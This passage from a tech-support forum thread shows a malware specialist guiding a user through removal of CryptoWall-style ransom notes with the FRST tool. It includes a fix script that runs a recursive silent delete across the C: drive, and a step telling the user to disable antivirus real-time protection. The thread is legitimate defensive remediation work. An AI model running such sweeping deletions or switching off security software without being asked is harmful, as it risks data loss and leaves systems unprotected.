    Disk: 1 (MBR Code: Windows XP) (Size: 111.8 GB) (Disk ID: 9DC96E9E)
    Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
    Partition 2: (Not Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ==================== End Of Log ============================
     
  11. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Attached are the results of the shortcut.txt. File was too long to be able to display.
     

    Attached Files:

  12. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Please download the enclosed file (see below) and save it in the same location FRST is saved.
    • Start FRST with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
      Please copy and paste its contents in your next reply.
     

    Attached Files:

  13. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Attached are the results of the fixlog.txt....could not post due to file being too big !!!
     

    Attached Files:

  14. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Please download the enclosed file (see below) and save it in the same location FRST is saved.
    • Temporarily turn off McAfee real time protection.
    • Start FRST with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
      Please copy and paste its contents in your next reply.
     

    Attached Files:

  15. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    THESE ARE THE RESULTS OF THE FIXLOG.TXT....KEEP IN MIND THAT REAL TIME SCANNING WAS DISABLED.


    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 11-03-2015
    Ran by RAUL_104 at 2015-03-29 15:48:14 Run:2
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Loaded Profiles: RAUL_104 (Available profiles: RAUL_104 & RAUL_106 & AMY_106 & AMY_1061 & Administrator & Guest)
    Boot Mode: Normal

    ==============================================

    Content of fixlist:
    *****************
    Start
    CloseProcesses:
    C:\WINDOWS\System32\atolpphm.exe
    C:\Documents and Settings\RAUL_104\atolpphm.exe
    C:\Documents and Settings\RAUL_104\Application Data\msitsxr.exe
    CMD: Del /q /s C:\HELP_DECRYPT.*
    End
    *****************

    Processes closed successfully.
    "C:\WINDOWS\System32\atolpphm.exe" => File/Directory not found.
    "C:\Documents and Settings\RAUL_104\atolpphm.exe" => File/Directory not found.
    "C:\Documents and Settings\RAUL_104\Application Data\msitsxr.exe" => File/Directory not found.

    ========= Del /q /s C:\HELP_DECRYPT.* =========

    C:\Documents and Settings\All Users\Application Data\McAfee\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\dspwrp\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\dspwrp\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\data\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\data\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\MSC\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\MSC\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\SACore\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\SACore\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\sasshmod.dll\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\sasshmod.dll\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saUpd.exe\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saUpd.exe\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saupkeep.dll\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saupkeep.dll\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\quarantine\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\quarantine\HELP_DECRYPT.URL
    Access is denied.

    ========= End of CMD: =========



    The system needed a reboot.

    ==== End of Fixlog 16:05:46 ====
     
Short URL to this thread: https://techguy.org/1145587
